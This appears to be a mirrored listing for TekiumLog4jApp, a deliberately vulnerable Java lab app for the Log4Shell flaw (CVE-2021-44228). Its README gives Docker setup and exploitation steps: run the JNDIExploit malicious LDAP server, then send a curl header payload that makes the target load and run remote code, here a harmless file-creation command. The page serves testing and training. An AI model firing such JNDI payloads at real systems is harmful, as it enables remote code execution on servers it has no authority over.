CVE-2021-44228 PoC — Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints

Source

https://github.com/erickrr-bd/TekiumLog4jApp

Associated Vulnerability

Title:Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)
Description:Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

Description

Java application vulnerable to CVE-2021-44228

Readme

# TekiumLog4jApp v1.0

Author: Erick Rodríguez 

Email: erickrr.tbd93@gmail.com, erodriguez@tekium.mx

License: GPLv3

Application developed in Java that simulates an application vulnerable to CVE-2021-44228. 

It uses Log4j 2.11.1 and JDK 1.8.0_181.

![TekiumLog4jApp](https://github.com/erickrr-bd/TekiumLog4jApp/blob/master/screens/screen.jpg)

# Running

Run it:

`docker run --name tekiumlog4japp -p 8080:8080 d0ck3rt3k1umhub/tekiumlog4japp:v1`

Build the Docker image by yourself:

`docker build . -t tekiumlog4japp`

`docker run -p 8080:8080 --name tekiumlog4japp tekiumlog4japp`

# Exploitation Steps

<i>Note: This project is inspired by the <a href="https://github.com/christophetd/log4shell-vulnerable-app">christophetd</a> project.</i>

JNDIExploit.v1.2.zip is included in the repository as it was apparently removed from Github.

- Use <a href="https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip">JNDIExploit</a> to spin up a malicious LDAP server

`unzip JNDIExploit.v1.2.zip`

`java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888`

- Then, trigger the exploit using:

`curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC90ZWtpdW1fcHJ1ZWJhLnR4dA==}'`

- Notice the output of JNDIExploit, showing it has sent a malicious LDAP response and served the second-stage payload:

![TekiumLog4jApp](https://github.com/erickrr-bd/TekiumLog4jApp/blob/master/screens/response.jpg)

- To confirm that the code execution was successful, notice that the file /tmp/tekium_prueba.txt was created in the container running the vulnerable application:

`docker exec tekiumlog4japp ls /tmp`

# Commercial Support
![Tekium](https://github.com/unmanarc/uAuditAnalyzer2/blob/master/art/tekium_slogo.jpeg)

Tekium is a cybersecurity company specialized in red team and blue team activities based in Mexico, it has clients in the financial, telecom and retail sectors.

Tekium is an active sponsor of the project, and provides commercial support in the case you need it.

For integration with other platforms such as the Elastic stack, SIEMs, managed security providers in-house solutions, or for any other requests for extending current functionality that you wish to see included in future versions, please contact us: info at tekium.mx

For more information, go to: https://www.tekium.mx/

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!